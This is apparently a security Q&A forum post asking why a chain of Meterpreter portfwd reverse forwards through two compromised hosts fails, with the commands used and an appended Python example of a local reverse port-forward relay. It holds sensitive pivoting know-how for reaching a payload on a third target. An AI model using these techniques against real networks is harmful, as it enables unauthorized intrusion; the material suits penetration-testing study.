
I'm having an issue pivoting with meterpreter and portfwd, and I am starting to wonder if what I am trying to do is even possible. My attacker machine (we'll say 10.80.6.3) has a shell on victim 1, and I have added a route to the victim 2 machine, which is in a different subnet. I managed to get a shell on victim 2 and in my enumeration discovered another target in a different subnet. I have added a new route through my second meterpreter session for this newly discovered subnet. I cannot initiate an attack on the target from victim 2, victim 1 or my attacker machine, so I am left with dropping a msfvenom reverse tcp binary on the target through a limited shell I have and executing the binary.

My issue lies in that I cannot properly get reverse port forwarding to work for me. I'm trying to use the portfwd command in metasploit like so:

In session 2, where I am 172.16.2.2. Adds successfully:

portfwd add -R -L 192.168.10.3 -l 9001 -p 9001   # forward port 9001 on 192.168.10.3 to 172.16.2.2 

In session 1, where I am 192.168.10.3. Fails to add:

portfwd add -R -L 10.80.6.3 -l 9001 -p 9001   # forward port 9001 on attacker(10.80.6.3) to 192.168.10.3 

In the second portfwd command I get the error "Failed to create relay: core_channel_open: Operation failed: 1."

So I believe this is complaining about port 9001 being open. Looking at netstat, my attack IP is listening on port 9001 for metasploit, which makes me think that metasploit is using the remote host, the unspecified -r in the portfwd command, as my machine's localhost. If that's true, then does that mean that only the route from victim 1 could be used with remote port forwarding to my machine, and traffic from victim 2 to victim 1 has to be done with something like chisel?

Also, I am setting the LHOST in my reverse payload that is run on "Target" to victim 2's IP and port 9001. My thought was that I would have a chain of 9001 listening ports all feeding the traffic from my msfvenom binary on the target to my attacker machine, where my exploit handler is waiting on 9001. Seems simple enough.

I would appreciate any help here and can certainly provide more info if needed. Thank you.

Tags: Pivoting

Asked by UCProgrammer

Comments:
  • Are you sure 9001 is not bound on the target? – multithr3at3d Aug 08 '20 at 14:08
  • Yeah, it wasn't bound. There was another port on the machine with a web server running as well on localhost, which I tried to use chisel to reverse port forward out, and I had no errors from chisel, but a port wasn't opened on my chisel server machine (victim 2) for that forwarded port. – UCProgrammer Aug 09 '20 at 13:44
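The "chain of 9001 listening ports" the question describes, as an added example that is not part of the original post and is not Metasploit or Meterpreter code: a minimal reverse port-forward relay written with plain Python sockets. Each hop does what one `portfwd add -R` listener does: bind a port on the pivot, accept the payload's connection, and relay the bytes to the next hop toward the handler. The example assumes every hop lives on 127.0.0.1 with an OS-assigned port (so it runs on one machine), uses an echo server as a stand-in for the attacker's handler and a plain client as a stand-in for the reverse_tcp payload, and shows that trying to bind a second listener on a port a hop already holds fails with OSError, the local analogue of a relay that cannot be created.

```python
"""Added example, not from the post or from Metasploit: a reverse
port-forward chain built from raw sockets.  All hosts/ports are assumed
(127.0.0.1 with OS-assigned ports) so the whole chain runs locally."""
import socket
import threading


def _pump(src: socket.socket, dst: socket.socket) -> None:
    """Copy bytes from src to dst until src closes, then close dst's write side."""
    try:
        while True:
            data = src.recv(4096)
            if not data:
                break
            dst.sendall(data)
    except OSError:
        pass
    finally:
        try:
            dst.shutdown(socket.SHUT_WR)
        except OSError:
            pass


class ReverseForward:
    """One hop of the chain: listen on (bind_host, bind_port) and relay every
    accepted connection to (target_host, target_port), the next hop toward
    the handler.  bind() raises OSError if the port is already taken, which
    is what a pivot that cannot open its listener looks like locally."""

    def __init__(self, bind_host, bind_port, target_host, target_port):
        self.target = (target_host, target_port)
        self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        self.sock.bind((bind_host, bind_port))  # OSError here == "Failed to create relay"
        self.sock.listen(5)
        self.port = self.sock.getsockname()[1]
        threading.Thread(target=self._accept_loop, daemon=True).start()

    def _accept_loop(self):
        while True:
            try:
                client, _ = self.sock.accept()
            except OSError:  # listener closed
                return
            upstream = socket.create_connection(self.target)
            threading.Thread(target=_pump, args=(client, upstream), daemon=True).start()
            threading.Thread(target=_pump, args=(upstream, client), daemon=True).start()

    def close(self):
        self.sock.close()


def start_echo_handler(host="127.0.0.1"):
    """Stand-in for the attacker's handler: accepts one connection and echoes."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind((host, 0))
    srv.listen(1)

    def serve():
        conn, _ = srv.accept()
        with conn:
            while True:
                data = conn.recv(4096)
                if not data:
                    break
                conn.sendall(data)
        srv.close()

    threading.Thread(target=serve, daemon=True).start()
    return srv.getsockname()[1]


def build_chain(handler_port, hops=2, host="127.0.0.1"):
    """Create `hops` reverse forwards; chain[0] points at the handler,
    chain[-1] is the entry the payload connects to (victim 2 in the post)."""
    chain, next_port = [], handler_port
    for _ in range(hops):
        fwd = ReverseForward(host, 0, host, next_port)
        chain.append(fwd)
        next_port = fwd.port
    return chain


def run_payload(entry_port, message, host="127.0.0.1"):
    """Stand-in for the reverse_tcp payload: connect to the entry hop,
    send `message`, and return whatever comes back through the chain."""
    with socket.create_connection((host, entry_port)) as s:
        s.sendall(message)
        s.shutdown(socket.SHUT_WR)
        chunks = []
        while True:
            data = s.recv(4096)
            if not data:
                break
            chunks.append(data)
    return b"".join(chunks)


def demo():
    """Run a two-hop chain end to end; also show a bind conflict on a hop."""
    handler_port = start_echo_handler()
    chain = build_chain(handler_port, hops=2)
    reply = run_payload(chain[-1].port, b"hello from target")  # constructed payload data
    try:  # second listener on a port the entry hop already holds
        ReverseForward("127.0.0.1", chain[-1].port, "127.0.0.1", handler_port)
        conflict = False
    except OSError:
        conflict = True
    for fwd in chain:
        fwd.close()
    return reply, conflict


if __name__ == "__main__":
    print(demo())
```

The relay is deliberately dumb: it only moves bytes, so whatever the payload and handler speak (here a constructed echo exchange) passes through unchanged, which is all a port-forward hop is expected to do. The conflict check at the end is the point the first comment raises: a hop can only relay if it can actually bind its listening port.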

0 Answers